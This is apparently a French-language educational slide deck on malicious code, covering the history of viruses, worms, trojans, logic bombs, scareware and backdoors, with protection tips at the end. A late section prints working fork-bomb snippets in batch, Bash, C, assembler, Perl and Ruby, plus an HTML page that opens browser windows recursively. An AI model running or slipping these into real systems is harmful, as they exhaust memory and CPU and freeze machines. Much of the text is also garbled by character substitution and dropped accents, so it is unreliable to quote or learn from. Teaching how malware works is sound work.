Codes malveillants

Worms (vers), virus et bombes logiques

Christophe Casalegno
Groupe Digital Network

Codes malveillants
On dsigne sous le terme gnrique de codes malveillants ou
malwares l'ensemble des codes dvelopps dans le but de nuire
un systme informatique !l e"iste de trs nombreuses formes
diffrentes de malware #arler de code $malicieu"& est une er'
reur( le terme $malware& se traduirait dans son conte"te sous
le terme $malveillant& (malicious est un fau" ami)
!l e"iste de nombreu" malwares tel que( virus , vers (worms),
bombes logiques (soft bomb), wabbits, c)evau" de troie (tro*an
)orses), portes drobes (bac+doors), spyware, scarewares
(rogue), root+its, dialers, adwares, ou parfois encore la combi'
naison de plusieurs de ces formes la fois

Codes malveillants
LES VIRUS INFR!"#I$UES

Codes malveillants
LES VIRUS INFR!"#I$UES
,n peu d')istoire( les origines

Codes malveillants
-n ./0/, 1o)n 2ouis 3on 4eumann, mat)maticien considr
au*ourd')ui comme l'un des $pres& des ordinateurs et de
l'informatique moderne, publie un article intitul $5)orie et
organisation des automates comple"es&
2')omme qui on doit l'ide de programmes stoc+s en mmoire et
modifiables plut6t que des programmes plus rapides mais $figs&
dans les composants matriels voque alors dans cet article( $la
possibilit pour un programme de prendre le contr6le d'un autre
programme&
2es concepts de programmes autoreproducteurs qu'il y dveloppe
alors, en font le pre fondateur des t)ories de virologie informatique

Codes malveillants
-n ./7/, le maga8ine $9cientific :merican& publie un article sur les
mcanismes auto'rplicateurs, crit par 29 #enrose intitul(
$9elf';eproducing <ac)ines& prsent dans le sommaire du
maga8ine comme traitant de(
$9imples units qui sont construites et qui s'assemblent entre elles
pour former des units plus importantes, qui vont leur tour faire des
copies d'elles'm=me partir d'autres units simples&
2e processus mets en lumire les m=mes mcanismes d'auto'
reproduction que ceu" des molcules biologiques

Codes malveillants
-n :o>t ./?., trois *eunes programmeurs des clbres @ell
2aboratories (:55), ;obert 5)omas <orris, Aouglas <c!lory et 3ictor
3ysotts+y, dveloppent un *eu appel Aarwin qui se *oue sur
mainframe !@< BC/C l're des cartes perfores
2e *eu est compos d'un programme $umpire& ainsi que d'une
section de la mmoire de l'ordinateur, appele l'arne dans laquelle D
programmes ou plus, crits par les *oueurs sont c)args
2es programmes sont crits en langage mac)ine pour BC/C sur cartes
perfores, et peuvent appeler un certain nombre de fonctions fournies
par $umpire& dans le but d'occuper d'autres emplacements dans
l'arne, de tuer les programmes ennemis et de remplir toute la
mmoire libre par des copies d'eu" m=me

Codes malveillants
,n !@< BC/C

Codes malveillants
2e *eu peut se terminer aprs une dure prdfinie ou quand il ne
reste plus qu'un seul programme en vie( le *oueur qui a crit le
programme qui reste le dernier survivant est dclar vainqueur
Ees programmes (les combattants) qui s'affrontent dans une arne
ont notamment inspirs le film 5ron dans lequel un programmeur est
pro*et l'aide d'un systme de dmatrialisation au cFur d'un
systme informatique
Eependant, le *eu ne perdure pas car ;obert 5)omas <orris russi
alors dvelopper un combattant compos de GG instructions,
capable d'adapter sa stratgie et de se protger, que personne
n'arrive vaincre( de ce fait, plus personne ne dveloppe alors
d'adversaire et le *eu est abandonn

Codes malveillants
LES VIRUS INFR!"#I$UES
,n peu d')istoire( le Eore War

Codes malveillants
9uite l'abandon de Aarwin, entre ./?. et ./BC va naHtre le vritable
anc=tre des virus( le Eore War, appel galement le *eu des
programmeurs
: l'instar de Aarwin dont il s'inspire, le Eorewar consiste faire
s'affronter au minimum D programmes, oI c)acun a pour ob*ectif de
dtruire le(s) programme(s) adverse(s) et d'occuper toute la mmoire
disponible en assurant sa prolifration
2'arne se trouve maintenant au sein de l'espace mmoire d'une
mac)ine virtuelle appele <ars, au sein duquel l'attaquant, qui ignore
oI sont situs les diffrents segments de son adversaire, doit le
localiser et le dtruire

Codes malveillants
2e langage utilis pour crer ses combattants dans le Eorewar, le
;edEode est proc)e de l'assembleur avec toutefois un *eu
d'instruction simplifi
!l s'e"cute dans une mac)ine virtuelle appele <:;9 pour <emory
:rray ;edcode 9imulator
!l e"iste plusieurs versions du langage ;edEode dans lesquelles le
nombre d'instructions peut varier, mais reste (trs) proc)e d'un
assembleur

Codes malveillants
<algr l'utilisation de ce langage au *eu d'instruction rduit, le Eore
War intgre ds sa cration, la plupart des mcanismes virau" et anti'
virau" connus au*ourd')ui( rplication, protection, polymorp)isme,
destruction, rparation, furtivit, in*ection de code, arr=t d'un
processus et m=me la reconnaissance des signatures si c)re nos
antivirus au*ourd')ui encore
2e vainqueur est celui qui possde la fin de la partie, le plus grand
nombre de copies actives du programme Aans le cas ou la partie
n'est pas limite dans le temps, celui qui a russi dtruire le
programme adverse est dclar vainqueur
:u*ourd')ui encore, on continue *ouer au Eore War, et des
comptitions sont rgulirement organises dans le monde entier

Codes malveillants
LES VIRUS INFR!"#I$UES
Afinition

Codes malveillants
,n virus informatique est un malware spcifique, self'rplicateur,
conJu, l'instar des virus biologiques, pour se propager par le
biais de programmes qu'il contamine en a*outant ou en crasant
un code viral
2a mac)ine ou le programme ainsi infect devient un $)6te& du
virus 2e virus peut se propager par l'intermdiaire de tout mdia
de communication, tels que disquettes, cd'rom, clefs usb,
emails, etc
2es virus ne sont pas autonomes( ils ncessitent un programme
)6te pour se dupliquer et se propager On dnombre plusieurs
di8aines de milliers de virus diffrents s'attaquant principalement
au systme Windows de <icrosoft mais pas seulement

Codes malveillants
LES VIRUS INFR!"#I$UES
,n peu d')istoire( le premier virus

Codes malveillants
Ae nombreuses sources sur !nternet ou ailleurs citent $@rain&
comme tant le premier virus de l')istoire Eelui ci, dvelopp en ./K?
par deu" frres #a+istanais, les frres :lvi contaminait les disquettes
(7L M uniquement) et ne s'attaquait pas au" disques durs
Aurant l'infection, @rain se plaJait sur le secteur de dmarrage de la
disquette puis renommait le nom de volume de la disquette par
l'intitul $ (E) @rain&
@rain n%est pas le premier virus recens( la paternit du premier virus
revient Ri&h Skrenta, un tudiant amricain alors Ng de .7 ans, qui
en ./KD cre Elk Cloner sur :pple !! Elk Cloner envoyait un
pome e"pliquant sa manire de s'auto'rpliquer Ri&h aurait ainsi
russi infecter les ordinateurs de ses amis en leur proposant des
*eu" pirats infects

Codes malveillants
LES VIRUS INFR!"#I$UES
Onralits

Codes malveillants
!l e"iste de trs nombreuses formes de virus et ces derniers peuvent
=tre crits dans n'importe quel langage P cependant, les premiers virus
taient souvent crits en assembleur
2es virus contaminent gnralement un programme en y in*ectant du
code viral Ee code viral est alors ra*out en dbut, milieu, ou fin de
programme !l peut galement craser du code e"istant 2e
programme est alors infect
As que le programme est e"cut, il active le code viral, qui va alors
infecter d'autres programmes e"cutables 2'action du virus ne se
limite pas l'infection( en fonction de certains paramtres, il active
gnralement un sous programme e"cutant une action pr'
dtermine, allant de l'affic)age d'un message la destruction de
donnes( On parle alors de l'activation d'une $bombe logique&

Codes malveillants
2es virus informatiques, l'instar des virus biologiques, ont un cycle
de vie !l est dcoup en B #)ases(
. ' Eration( le programmeur crit le virus
D ' Oestation( l'implantation du virus afin de permettre sa diffusion
0 ' !nfection, reproduction et prolifration
G ' :ctivation (rveil et action selon date, signau" etQou conditions)
7 ' Acouverte (peut plus rarement =tre dans les p)ases prcdentes)
? ' !dentification et assimilation (mise au points des parades)
B ' Rradication( tape t)orique dans laquelle toutes les copies du
code viral sont dtruites

Codes malveillants
2es virus peuvent utiliser ou combiner G procds d'infection vitesse
variable(
. S !nfection lente( infection des fic)iers que s'ils sont modifis ou
cres afin de tromper les vrificateurs d'intgrit
D S !nfection normale( infection des programmes au fur et mesure
de leur e"cution
0 S !nfection rapide( infection non seulement du programme e"cut
mais galement tout programme ouvert ou prsent sur le systme
G S !nfection occasionnelle etQou conditionnelle( l'infection sporadique
a plus de c)ance de passer inaperJue

Codes malveillants
LES VIRUS INFR!"#I$UES
2es virus de boot

Codes malveillants
2e virus de boot est un virus spcifique dont le code e"cutable est
enregistr dans le premier secteur du disque (le secteur de
dmarrage) galement appel <@; pour <aster boot record On
trouve ce secteur sur la plupart des mdias tels que les disquettes, les
clefs usb, les disques durs ou les EAQA3A';O<

Ee secteur n'est pas un fic)ier proprement parler, mais permet au"
systmes d'e"ploitation de booter (dmarrer) Aans les annes DCCC,
environ D7T des virus taient de cette nature
2a particularit de ce virus, est de n'avoir aucun fic)ier visible(
l'utilisateur a donc tendance considrer alors le mdia apparaissant
vide comme inoffensif Eertains @!O9 de carte mre ont la particularit
de pouvoir protger le <@; du disque dur contre les critures

Codes malveillants
LES VIRUS INFR!"#I$UES
2es macrovirus

Codes malveillants
2es macrovirus font partie des virus les plus loigns du virus originel
-n effet, ils n'utilisent pas du tout un langage proc)e du systme tel
que l'assembleur mais le langage de macro d'un logiciel pour en
altrer le fonctionnement (souvent 3isual @asic avec Word ou -"cel)
!ls s'attaquent donc principalement au" fic)iers des utilisateurs et
n'infectent pas des programmes( trs faciles programmer, ils se
rpandent par c)ange de fic)ierslorsque le fic)ier est ouvert

Eependant, au*ourd')ui (en gnral), un logiciel n'e"cute les macros
contenues dans un document qu'aprs la confirmation de l'utilisateur,
emp=c)ant alors l'e"cution du virus 9i le fic)ier $sain& intgre des
macros, l'utilisateur est alors tromp, et le code )ostile est lanc !l
pourra alors infecter d'autres fic)iers de l'utilisateur qui les rpandra
son tour

Codes malveillants
LES VIRUS INFR!"#I$UES
2es rtrovirus ou virus flibustiers

Codes malveillants
On appelle $ rtrovirus & ou $ virus flibustier & (bounty )unter) un virus
informatique ayant la capacit de s'attaquer un antivirus afin de le
rendre inoprant
#lusieurs mt)odes peuvent =tre utilises par les rtrovirus, tel que la
modification les signatures antivirus afin de ne pas =tre dtects ou
encore la simulation d'un comportement )umain (le rtrovirus va alors
reproduire la manipulation normale de dsactivation de l'antivirus( ce
dernier croyant avoir faire un utilisateur autoris sera donc
dsactiv laissant le c)amps libre au rtrovirus)
2es rtrovirus font parti des virus les plus rares mais galement les
plus dangereu" car ils sont capables de passer plusieurs barrires de
protections sans =tre dtects

Codes malveillants
LES VIRUS INFR!"#I$UES
2es virus polymorp)es

Codes malveillants
Eomme leur nom l'indique, les virus polymorp)es ont la capacit de
c)anger de forme, et donc par la m=me de tromper les antivirus
fonctionnant sur la base de signatures
:fin de russir cette prouesse, les virus polymorp)es cryptent etQou
modifient le code qui les compose c)aque fois qu'ils se
reproduisent( de fait, c)aque copie du virus est alors diffrente de la
prcdente
#our russir cette prouesse, le virus polymorp)e utilise gnralement
une routine de c)iffrement qui lui permet de modifier certaines de ses
instructions au fil des rplications

Codes malveillants
Eependant cette mt)ode utilise pour rendre le virus polymorp)e,
requiert l'utilisation de procdures de c)iffrement et de dc)iffrement,
pour que le code viral puisse s'e"cuter
E'est ici que se situe la faille du mcanisme( les procdures de
c)iffrementQdc)iffrement, elles, ne c)angent pas et constituent alors
des lments invariables
2es anti'virus base de signature peuvent donc en lieu et place de
signatures $classiques&, utiliser les procdures spcifiques de
cryptage Q dcryptage dont se sert le virus pour se camoufler, comme
signature

Codes malveillants
LES VIRUS INFR!"#I$UES
2es virus mtamorp)es

Codes malveillants
2es virus mtamorp)es ressemblent beaucoup au" virus poly'
morp)es, car ils ont galement la capacit de c)anger de forme, et
donc de tromper les antivirus fonctionnant sur la base de signatures
Eependant, contrairement au" mt)odes simples de c)iffrement et de
dc)iffrement utilises par les virus polymorp)es, les virus mta'
morp)es sont capables de modifier leur structure ainsi que les
instructions qui les composent
:lors que les diffrentes formes mutes d'un virus polymorp)e
partagent le m=me noyau, et notamment la m=me fonction de
mutation, celles d'un virus mtamorp)e ont c)acune un noyau
diffrent, ce qui le rend beaucoup plus difficile dtecter

Codes malveillants
LES 'R!S (VERS)
On les confond tort avec les virus

Codes malveillants
,n ver (ou Worm en anglais), est un programme autonome qui assure
sa reproduction en contaminant d'autres ordinateurs, gnralement
via l'e"ploitation d'une ou plusieurs vulnrabilit(s)
Eontrairement au" diffrents virus prsents, le ver n'a pas besoin
d'un programme )6te pour se propager( une conne"ion rseau lui
suffit

2es vers ont une vitesse de propagation trs leve car ils n'ont pas
besoin d'une action )umaine (lancement de programme par e"emple)
pour =tre activs
!ls peuvent donc se rpandre sur des milliers de mac)ines vulnrables
en peine quelques minutes : ce titre, les vers peuvent se rvler
beaucoup plus dangereu" que les virus

Codes malveillants
2es vers peuvent embarquer d'autres programmes ou sous'
programmes qui seront alors installs sur la cible, comme des bombes
logiques, des virus ou d'autres malwares (bac+doors, root+it,
+eylogger, sniffers, etc)
2es vers peuvent galement utiliser des tec)niques prsentes dans
les rtrovirus (virus flibustiers), les virus polymorp)es ou les virus
mtamorp)es pour se camoufler ou dsactiver certains mcanismes
de protection
-nfin ils peuvent galement analyser la cible et s'y adapter en
tlc)argeant des instructions ou des programmes complmentaires
au travers d'internet (e"ploits, virus, etc)

Codes malveillants
2e premier ver informatique connu, parfois appel ;ogue ou Oreat
worm, est le ver de <orris !l a t crit par ;obert 5appan <orris, fils
de ;obert <orris 9r, cryptograp)e et spcialiste en scurit
informatique qui travaillait notamment au 4E9E (4ational Eomputer
9ecurity Eenter), une branc)e de la 49: (4ational 9ecurity :gency)
2e D novembre ./KK, ;obert 5appan <orris lance son ver partir du
<!5 EonJu pour =tre inoffensif, des erreurs dans son code l'ont rendu
plus dangereu", le rendant capable d'infecter plusieurs fois un
systme, *usqu' rendre ce dernier inutilisable
2e ver <orris qui infectait les mac)ines 3:U, e"ploitait deu"
vulnrabilits (sendmail et fingerd) combines une tentative de
bruteforce des mots de passe

Codes malveillants
<orris fut ainsi la premire personne =tre condamne en vertu du
Eomputer Vraud and :buse :ct de ./K? :insi aprs =tre all en appel
il f>t condamn 0 ans de probation, GCC )eures de travau"
communautaires et une amende de plus de .CCCCW
E'est suite ce ver que fut cr le premier E-;5 (Eomputer
-mergency ;esponse 5eam), centre d'alerte et de raction au"
attaques informatiques dont le r6le est la fois centralisateur, mais qui
s'occupe galement du traitement des alertes, de la raction
apporter, de l'c)ange d'information avec les autres E-;5s, de
l'tablissement et de la maintenance d'une base de donnes de
vulnrabilits ainsi que de la prvention via la diffusion d'informations
sur les prcautions prendre pour limiter les risques d'incident

Codes malveillants
Eode ;edest un e"emple intressant de worm (ver) s'attaquant au"
systmes serveurs <icrosoft Windows !l a t cre en DCC.
Eode ;ed ( ne pas confondre avec le langage ;ed Eode du
EoreWar) e"ploite une vulnrabilit des serveurs Web !!9 GC et 7C de
<icrosoft
!l a t conJu dans un ob*ectif prcis, savoir attaquer le serveur web
de la maison blanc)e 2orsque la mac)ine est infecte elle lance une
attaque de type Ani de 9ervice (Ao9) contre ce dernier

Codes malveillants
3ers volus rcentsP 9tu"net, Vlame
*oints &ommuns, sur'mdiatiss
9tu"net a t crit spcifiquement pour s'attaquer au" systmes
9E:A: en les reprogrammant et en camouflant les modifications qu'il
a effectu
!l s'attaque notamment au" :#! produites par 9iemens et utilises au
sein des centrales nuclaires et )ydro'lectriques
On trouve galement ces systmes dans les usines de distribution
d'eau potable ou encore dans la gestion des oloducs

Codes malveillants
3ers volus rcentsP 9tu"net, Vlame
*oints &ommuns, sur'mdiatiss
Vlame s'attaque au" systmes d'e"ploitation Windows de <icrosoft
@ien que l'on prsente la plupart de ses caractristiques comme
rvolutionnaires, il n'en est rien( la plupart de ses capacits
d'espionnage e"istent depuis plus d'une dcennie avant sa sortie
(interception des emails, des conversations en ligne, etc)

Codes malveillants
3ers volus rcentsP 9tu"net, Vlame
*oints &ommuns, sur'mdiatiss
Le m-the, une lgende urbaine cre par la presse et certaines
personnes en mal de reconnaissance mdiatiques prtendent que
seul des services tel que la E!: ou le <ossad seraient capables de
telles productions
;aliser de tels outils est parfaitement la porte de petites quipes
prives motives( nul besoin des moyens d'un tat pour dvelopper
de tels systmes

Codes malveillants
Ae manire gnrale, il est fort probable que les vers vont intgrer de
plus en plus de tec)nologies qui taient propres au" virus
(mtamorp)isme, rtroviralit) en y a*outant la capacit d'analyser une
cible, embarquant un compilateur volutif ainsi que la possibilit de se
connecter des ressources situes sur internet pour tlc)arger le
code )ostile ncessaire l'e"ploitation des vulnrabilits dtectes
2'ensemble des connaissances permettant ce type de ralisation est
accessible n'importe quel dveloppeur !l est galement possible de
crer des vers $primaires& en s)ell (uni" ou windows) intgrant les
mcanismes d'analyse Q tlc)argement Q e"ploitation en fonction de
la cible

Codes malveillants
LES C.EV"U/ DE #RIE
2e maillon faible, c'est vous

Codes malveillants
Eomme son nom la rfrence myt)ologique l'indique, un c)eval de
5roie ou 5ro*an Xorse est un programme ou un sous'programme
camoufl sous le nom ou au sein d'un programme lgitime
#ar dfinition, il ne cac)e pas forcment une fonction de type
malware( un *eu cac) et appel via une combinaison de touc)e
secrte dans un logiciel bureautique, est aussi un c)eval de 5roie
#arfois, seul le nom du programme laisse penser que le programme
est inoffensif( @ien que rpertori sous ce nom il ne s'agit pas
e"actement du fonctionnement d'un c)eval de 5roie( c'est uniquement
sous un fau" nom qu'il se cac)e alors

Codes malveillants
2e E)eval de troie est gnralement intgr au sein d'un programme
de type utilitaire ou application bureautique
!l s'agit alors de sous'programmes embarqus eu" m=me au sein d'
un programme lgitime 2ors du lancement du programme lgitime, ou
encore lors d'une action particulire, le sous'programme cac) est
alors e"cut
2es c)evau" de troie sont le plus souvent utiliss pour camoufler des
programmes malveillants( bac+doors, bombes logiques, +eyloggers,
spywares ou autres outils permettant de prendre le contr6le du
systme ou d'obtenir des informations rputes confidentielles

Codes malveillants
LES 0!0ES LGI$UES
,n danger bien rel pour vos donnes

Codes malveillants
2es bombes logiques parfois galement appeles $soft bombs& ou
bombes logicielles, sont gnralement des dispositifs massivement
destructeurs de donnes, programms pour se dclenc)er lors d'une
ou plusieurs conditions dtermines
Ees conditions sont souvent( un signal, une date, une )eure, ou
encore une action attendue d'un utilisateur ou d'un programme du
systme (ouverture d'un menu particulier, clic, squence de lettres ou
de c)iffres, lancement d'un logiciel, accs un fic)ier particulier ou
une ,;2 sur !nternet)
#arfois elles peuvent effectuer d'autres actions comme crypter les
donnes du systme d'information ou de la mac)ine qui la contient
(crypto bombe)


Codes malveillants
Eertaines bombes logiques peuvent galement =tre dclenc)es
distance par un email, ou tout autre protocole rseau (bombe lie la
pile 5E#Q!# de l'O9 qui se dclenc)era lorsque le c)amps data d'un
paquet 5E#Q!# contiendra une information particulire)
2es bombes logiques sont parfois utilises comme telle Eependant,
de nombreu" virus, vers et autres malwares embarquent parfois une
ou plusieurs bombes logiques dans leur code
2es bombes logiques sont frquemment utilises pour soutirer de
l'argent une cible, de la socit au particulier, via du c)antage( la
socit doit payer dans les proc)aines )eures pour ne pas perdre
toutes ses donnes, le particulier pour rcuprer ses documents
crypts, etc

Codes malveillants
'"00I#

Codes malveillants
2e wabbit est un malware particulier qui l'instar des virus a pour
principale caractristique l'autorplication
2a comparaison s'arr=te cependant ici car contrairement au" virus il
n'infecte ni les programmes, ni les documents, ni le secteur de
dmarrage
Eontrairement au" vers, il ne se propage pas au travers des rseau"
,ne for+ bomb par e"emple (cration d'un nombre trs important de
processus dans le bug de saturer toute la mmoire disponible ainsi
que le E#, disponible) est un wabbit

Codes malveillants
$uel1ues e2emples de 3ork 4om4,
9ous Windows dans un fic)ier batc)( TCYTC
Ou encore(
:s
start %0
goto :s
9ous ,ni" en s)ell @as): :(){ :|:& };:
(() dfinit une fonction nomme ( Z (Y([ \ est le corps de la fonction
Aans celui'ci, la fonction s'appelle elle'm=me ((), puis redirige la sortie
l'aide d'un pipe (Y) sur l'entre de la m=me fonction ( et cac)e le
processus en fond avec [ 2a fonction, ensuite appele avec (,
s'appelle rcursivement l'infini

Codes malveillants
$uel1ues e2emples de 3ork 4om4,
-n langage E
]include ^unistd)_

int main(void)
Z
w)ile(.) Z
Q` ici on peut a*outer un malloc pour utiliser plus de ressources `Q
for+()P
\
return CP
\

Codes malveillants
$uel1ues e2emples de 3ork 4om4,
En assem4leur 256,
entry start
start(
pus) C"D
pop ea"
int C"KC
*mp start
En perl, perl 'e Lfor+ w)ile for+L [
En Ru4-, loop Z for+ \

Codes malveillants
$uel1ues e2emples de 3ork 4om4,
#out simplement en .#!L,
<html>
<script type="text/a!ascript">
"#$ctio$ ope$%target%&la$'() {
(i$)o(*ope$((i$)o(*locatio$);
}
(i$)o(*o$loa) = ope$%target%&la$'();
</script>
<&o)y>
</&o)y>
</html>

Codes malveillants
LES RGUES U SC"RE'"RE

Codes malveillants
,n rogue, ou scareware est en quelque sorte une e"ploitation
automatique du social engineering(
-n se promenant sur un site internet, un utilisateur recevra une alerte
lui indiquant que sa mac)ine est infecte par un logiciel malveillant
On lui indique ensuite gnralement un logiciel qu'il peut installer pour
nettoyer son ordinateur
9ouvent, on demande l'utilisateur de payer une licence de quelques
di8aines de dollars( non seulement l'utilisateur s'est infect lui m=me
mais en plus il a pay pour le faire

Codes malveillants
LES 0"C7DRS E# R#7I#S
2es portes drobes

Codes malveillants
On appelle bac+door, une fonctionnalit cac)e, gnralement par le
son concepteur, dans un programme ou un sous'programme,
permettant de donner un accs privilgi, gnralement
administrateur, au software concern
,ne bac+door peut galement =tre introduite par un tiers, via la
modification d'un logiciel Onralement, les bac+doors permettent de
contourner les mesures d'aut)entifications, souvent y compris des
mesures ra*outes aprs sa mise en place
Ae nombreuses bac+doors ont t introduites par le concepteur du
software la contenant, notamment afin de permettre la maintenance
du software en cas de la perte des accs par le client, ou bien afin de
pouvoir dsactiver ce dernier en cas de contentieu"

Codes malveillants
2orsque la bac+door permet la fois de dissimuler une activit et de
prenniser un accs administrateur on la dsigne gnralement sous
le terme de root+it
Eertaines bac+doors vont *usqu' s'attaquer au noyau par
l'intermdiaire de modules rsidents tel que l+m (linu" +ernel module)
par e"emple, leur permettant d'intercepter tous les appels y compris
de commandes $saines& et non modifies
<=me avec un nettoyage approfondi, il est difficile d'=tre certain
.CCT que le systme est nouveau $sain&, et il reste prfrable de
le rinstaller compltement (sans oublier le bootloader)

Codes malveillants
#lusieurs bac+doors Windows ont connu leur )eure de gloire, y
compris auprs des administrateurs, car certaines offraient des
possibilit qui n'e"istaient pas dans les outils d'administration
standard
@ac+ Orifice, cre en ao>t .//K par la team $Eult of t)e Aead Eow
(cAc ou en VranJais le Eulte de la vac)e morte) permet notamment
d'accder l'ensemble des informations systme, d'affic)er le contenu
d'un fic)ier distance, de lancer un serveur )ttp intgr, ou encore
c)ose impossible d'origine sous Windows /7Q/K de lister l'ensemble
des processus en cours d'e"cution
!l permet galement d'accder la base de registre, d'affic)er une
boite du dialogue ou de voir laensemble des mots de passe stoc+s
sur la mac)ine

Codes malveillants
9ubseven quant lui, dvelopp galement la fin des anne /C,
permet dans une interface grap)ique trs simple cot $client&, et
aprs e"cution du binaire par l')6te, souvent au travers d'une
mt)ode de type c)eval de troie, permet de(
9canner des ips, =tre notifi automatiquement de la conne"ion via !Eb
ou !;E, uploader et e"cuter des fic)iers, les effacer, dclenc)er
l'impression sur l')6te, affic)er une image, ouvrir ou fermer le lecteur
EA, activer la webcam et regarde ce qui se passe, inverser l'cran,
voir le bureau et en prendre le contr6le, enregistrer tous les mots de
passe utiliss, intragir Q dialoguer avec l'utilisateur de l')6te, etc

Codes malveillants

Codes malveillants
C!!EN# SE *R#EGER8

Codes !alveillants
' <aintene8 vos applications et O9 *our, faites de la veille
' ,tilise8 un firewall et un antivirus
' Rvite8 l'ouverture de pices *ointes suspectes ou inutiles
' Rvite8 d'ouvrir un partage sans mot de passe solide
' ,tilise8 D antivirus diffrents( pour les serveurs et les clients
' 4e clique8 pas sur les liens que vous receve8 par email
' Vaites attention au" Xoa" concernant les virus